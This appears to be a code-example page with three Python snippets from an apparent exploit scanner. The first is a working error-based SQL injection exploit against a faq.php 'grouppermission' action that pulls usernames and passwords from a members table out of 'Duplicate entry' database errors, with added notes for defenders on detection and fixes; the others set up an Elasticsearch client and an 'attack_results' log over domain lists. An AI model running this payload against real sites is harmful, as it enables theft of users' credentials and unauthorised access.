Beispiel #1
    def exploit(self, url, count=0):
        """Send one error-based SQL injection request to faq.php and parse the reply.

        The request parameters set ``action=grouppermission`` and place SQL in
        the ``gids`` array parameters so that the database raises a
        "Duplicate entry" error. The text of that error carries the
        ``username`` and ``password`` columns of one row of the
        ``<table_pre>_members`` table.

        Defender notes (derived from the request and parsing below):
          * The request is recognisable by ``action=grouppermission`` together
            with SQL keywords (``select``, ``information_schema``,
            ``floor(rand(0)*2)``) inside ``gids[...]`` values sent to faq.php.
          * The technique only works when the application echoes database
            error text to the client; a "Duplicate entry" string in a faq.php
            response is a signal worth alerting on.
          * The server-side fix is to validate and parameterise the ``gids``
            values and to stop returning raw database errors.

        Args:
            url: Target base URL; normalised through
                EXPHttp.get_standard_url (its behaviour is not visible here).
            count: Row offset substituted into ``limit {start},1``.

        Returns:
            The first captured value split on a single space, or None when
            the table prefix lookup fails, the response is empty, or the
            response contains no "Duplicate entry" match.
        """
        self.initialize()
        http = EXPHttp()
        url = http.get_standard_url(url)

        # Append the vulnerable script's file name, adding the separating
        # slash only when the normalised URL does not already end in one.
        script = 'faq.php' if url[-1] == '/' else '/faq.php'
        url = url + script

        prefix = self.__get_table_pre(url)
        if not prefix:
            return None

        # "%23" is a URL-encoded "#", which comments out the rest of the
        # original SQL statement.
        template = "action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x20,password) from {table_pre}_members limit {start},1),floor(rand(0)*2))x from information_schema.tables group by x  )a)%23"
        request_params = template.format(table_pre=prefix, start=count)

        body = self.send_request(url, request_params)
        if not body:
            return None

        # NOTE: "[0,1]" is a character class (matches "0", "," or "1"), not
        # an alternation between 0 and 1.
        matches = re.compile(r"Duplicate entry '[0,1]?(.*?)[0,1]?'").findall(body)
        if not matches:
            print('Exploit Failed')
            return None

        # The payload joins the two columns with 0x20 (a space), so splitting
        # on a space separates them again.
        return matches[0].split(' ')
	def __init__(self, exploit_file):
		"""Set up the exploit reference, search client, results file and HTTP helper.

		Args:
			exploit_file: Stored unchanged on ``self.exp``; how it is used is
				not visible in this method.
		"""
		self.exp = exploit_file
		# Client for an Elasticsearch node on the local machine.
		self.es = Elasticsearch('127.0.0.1:9200')
		# file_name is a module-level name defined outside this method. The
		# file is opened in append mode, so the header line below is written
		# again on every instantiation; the handle is not closed here.
		self.file = open(file_name, 'a')
		self.file.write('domain_list\t\t\tattack_results\n')
		self.httptools = EXPHttp()
Beispiel #3
 def __init__(self):
     """Start with no exploit or keywords module loaded and create the HTTP helper."""
     # Both module slots start empty; nothing in this method fills them.
     self.exp_module = self.keywords_module = None
     self.httptools = EXPHttp()